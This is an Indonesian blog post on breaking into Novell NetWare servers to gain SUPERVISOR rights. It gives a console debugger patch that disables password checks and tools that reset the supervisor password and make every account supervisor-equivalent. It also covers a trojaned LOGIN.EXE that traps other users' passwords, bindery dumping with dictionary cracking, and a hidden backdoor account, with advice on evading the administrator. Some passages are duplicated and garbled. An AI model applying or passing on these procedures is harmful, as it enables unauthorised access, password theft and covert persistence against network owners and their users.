Novell NetWare adalah Network Operating System yang dikeluarkan oleh Novel Inc. dan digunakan di lingkungan IBM PC Compatible.
MEMBOBOL NOVEL NETWARE
Novell Netware, sebagai salah satu Network Operating System yang banyak dipakai di Indonesia, merupakan OS yang menarik untuk dipelajari, karena kedekatannya dengan DOS yang umumnya sudah dikenal pemakai komputer di Indonesia.
Sebagai user biasa kita tidak bisa menggunakan feature-feature tertentu yang hanya bisa di akses oleh SUPER USER (SUPERVISOR dalam istilah Novell Netware).
Novell Netware, sebagai salah satu Network Operating System yang banyak dipakai di Indonesia, merupakan OS yang menarik untuk dipelajari, karena kedekatannya dengan DOS yang umumnya sudah dikenal pemakai komputer di Indonesia.
Sebagai user biasa kita tidak bisa menggunakan feature-feature tertentu yang hanya bisa di akses oleh SUPER USER (SUPERVISOR dalam istilah Novell Netware).
Berikut ini beberapa trik yang bisa digunakan untuk mendapatkan akses SUPERVISOR tersebut.
Catatan:
Tutorial ini dibuat untuk keperluan belajar dan penelitian Novell Netware, bahkan beberapa trik yang digunakan disini sering saya gunakan pada saat melakukan Maintenance System Novell Netware.
CARA MENDAPATKAN HAK AKSES SUPERVISOR
A. Mempunyai akses fisik ke Server
Biasanya orang yang mempunyai akses fisik ke Server (dengan menggunakan console server) adalah orang yang dipercaya untuk Maintenance System.
Keterangan :
Cat: Yg didalam [ ] adalah tombol keyboard yg harus ditekan.
Yg didalam { } adalah keterangan
Yg didalam { } adalah keterangan
Langkah-langkah mendapatkan hak akses supervisor
1. Tekan [Left Shift][Right Shift][Alt][Esc] secara bersamaan {Debugger Mode}
2. Ketik : d VerifyPassword 6 [Enter] {Catat 6 byte yg keluar sebagai hasilnya}.
3. Ketik: c VerifyPassword=B8 0 0 0 0 C3 [Enter] {Matikan cek password}
4. Ketik: g [Enter] {Lakukan perubahan}
Sesudah proses ini dilakukan anda dapat login sebagai Supervisor tanpa perlu mengisi password.
Untuk mengembalikan cek password:
1. Tekan [Left Shift][Right Shift][Alt][Esc] secara bersamaan {Debugger Mode}
2. Ketik: c VerifyPassword=xx xx xx xx xx xx [Enter] {xx=6 bytes yg dicatat}
3. Ketik: g [Enter] {Lakukan perubahan}
Atau kalau mau mudahnya (dan dimungkinkan) down servernya kemudian restart lagi, password check akan normal kembali, karena perubahan password check cuma di memory.
B. Mempunyai account user (meskipun hanya guest account).
1. Tekan [Left Shift][Right Shift][Alt][Esc] secara bersamaan {Debugger Mode}
2. Ketik: c VerifyPassword=xx xx xx xx xx xx [Enter] {xx=6 bytes yg dicatat}
3. Ketik: g [Enter] {Lakukan perubahan}
Atau kalau mau mudahnya (dan dimungkinkan) down servernya kemudian restart lagi, password check akan normal kembali, karena perubahan password check cuma di memory.
B. Mempunyai account user (meskipun hanya guest account).
Cara yang paling mudah adalah menggunakan program NW-HACK.EXE, kerja program ini sebagai berikut:
1. Jika SUPERVISOR sudah login (cek dgn USERLIST) jalankan program ini. Password Supervisor akan diubah menjadi SUPER_HACKER (Cool name eh?
2. Dan setiap account dalam server tersebut akan menjadi SUPERVISOR Equivalent yang berarti semua user setara dengan SUPERVISOR.
3. Kita harus memasang BACKDOOR sesudah mendapatkan akses seperti ini (karena kalau Supervisornya tahu, pasti dia akan mengubah status semua user yang sudah jadi Supervisor Equivalent ke status normal).
MENDAPATKAN PASSWORD LAIN DI NOVELL NETWARE
Password Trapper terbaik yang pernah saya kenal adalah :
Password Trapper terbaik yang pernah saya kenal adalah :
1. LOGIN.EXE (hasil patch dari Hacker Belanda bernama itsme)
2. PROP.EXE
Langkah-langkah menggunakan Password Trapper :
1. Login dengan hak akses SUPERVISOR
2. Ganti file LOGIN.EXE di directory SYS:LOGIN dengan file LOGIN.EXE hasil patch, jangan lupa mengganti flag/attributnya menjadi SRO.
3. Kemudian jalankan file PROP.EXE dengan option –C caranya ketik [PROP -C] untuk membuat bindery property baru (sebagai tempat password yang di trap).
4. Sesudah satu minggu atau satu bulan kemudian periksa hasil password kamu dengan perintah PROP -R atau boleh juga di pipe seperti PROP -R > NAMAFILE.
5. Untuk menjalankan PROP.EXE kita tidak perlu mempunyai hak akses Supervisor, cukup user biasa saja, bahkan tidak perlu login sama sekali yang penting IPX dan NETX (LSL, IPXODI dan VLM)
6. Saran saya siapkan PROP.EXE di disket kemudian jalankan dari disket
MENDAPATKAN SEMUA PASSWORD DI NOVELL NETWARE
a. Sebagai SUPERVISOR masuk ke directory SYS:SYSTEM, kemudian ketik BINDFIX.
b. Jawab semua pertanyaan dengan Yes, kalau sudah selesai,
c. Copy 3 (tiga) file berextension .OLD (cari tahu sendiri filenya) ke disket.
d. Gunakan program BINDERY.EXE sebagai berikut: BINDERY ETC > PASSWORD
e. Kemudian crack hasil di file PASSWORD menggunakan BINCRACK.EXE plus
f. FILEDICTIONARY (kumpulan password) sebagai berikut : BINCRACK PASSWORD FILEDICTIONARY > HASILPASS
MEMBUAT BACKDOOR
Untuk membuat backdoor, menggunakan file SUPER.EXE, dengan file ini kita bisa mendapatkan Supervisor Equivalent kapan saja kita inginkan. Untuk menggunakannya, kita harus menset terlebih dahulu agar bisa digunakan sebagai backdoor, caranya kita harus login dengan hak akses Supervisor .
Contoh : kita login dengan nama VICTORX, dan kita ingin mengganti status victorix sebagai user normal ataupun supervisor.
Untuk membuat backdoor, menggunakan file SUPER.EXE, dengan file ini kita bisa mendapatkan Supervisor Equivalent kapan saja kita inginkan. Untuk menggunakannya, kita harus menset terlebih dahulu agar bisa digunakan sebagai backdoor, caranya kita harus login dengan hak akses Supervisor .
Contoh : kita login dengan nama VICTORX, dan kita ingin mengganti status victorix sebagai user normal ataupun supervisor.
Langkah-langkah membuat backdoor :
a. Login sebagai Supervisor
b. Jalankan program SYSCON
c. Set equivalent user KECOAK sebagai SUPERVISOR
d. Tutup/Exit program SYSCON
e. Login sebagai VICTORX
f. Jalankan program SUPER.EXE sebagai berikut: SUPER +
g. Sekarang Toggle Supervisor Equivalent untuk VICTORX sudah ON
h. Login sebagai SUPERVISOR
i. Jalankan program SYSCON
j. Hapus equivalent SUPERVISOR user VICTORX
k. Tutup/Exit program SYSCON
l. Untuk selanjutnya mengaktifkan Supervisor Equivalent, anda tinggal login sebagai VICTORX kemudian mengetik SUPER +, untuk menonaktifkan Supervisor Equivalent ketiklah: SUPER
Utility ini memang untuk Supervisor, supaya sang Supervisor bisa mengganti status nya sebagai user biasa atau supervisor sesuai kebutuhan.
Tidak ada komentar:
Posting Komentar